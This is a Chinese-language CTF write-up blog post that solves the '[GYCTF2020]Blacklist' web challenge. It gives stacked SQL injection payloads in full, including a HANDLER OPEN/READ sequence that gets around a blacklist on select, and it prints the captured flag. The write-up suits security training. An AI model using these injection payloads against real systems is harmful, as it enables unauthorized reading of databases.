[GYCTF2020]Blacklist 1

打开实例发现get提交框，提交1发现显示

尝试万能密码无果

尝试联合注入，显示出了过滤规则，可以见到很多关键字都被过滤了

尝试堆叠注入，成功显示出数据表

?inject=1';show databases;

查表

?inject=1';use ctftraining;show tables;

看到了个FLAG_TABLE

查字段

?inject=1';use ctftraining;show tables;show columns from FLAG_TABLE;

这边显示not_flag,靠背了又查错表了

重新查询supersqli表

?inject=1';use supersqli;show tables;

看到FlagHere,这次准没错了

查字段

?inject=1';use supersqli;show tables;show columns from FlagHere;

看到flag的列，但是未能显示出flag

这边因为select等字段被过滤的原因，所以并不能采用直接select的方式进行查询，所以思考片刻决定采用handler进行查询

构造payload:

?inject=1';use supersqli;HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;

成功获取到flag

flag{40d647f8-9b46-4d91-82d1-d15815fab409}

posted @ 2024-11-13 11:45 TazmiDev 阅读(46) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· [极客大挑战 2019]BabySQL 1

· [SUCTF 2019]EasySQL 1

· [GYCTF2020]Blacklist

· [GYCTF2020]Blacklist-1|SQL注入|堆叠注入

· web19([GYCTF2020]Blacklist):

2025年3月

日

一

二

三

四

五

六

欢迎光临꒰ ๑͒ ･౪･๑͒꒱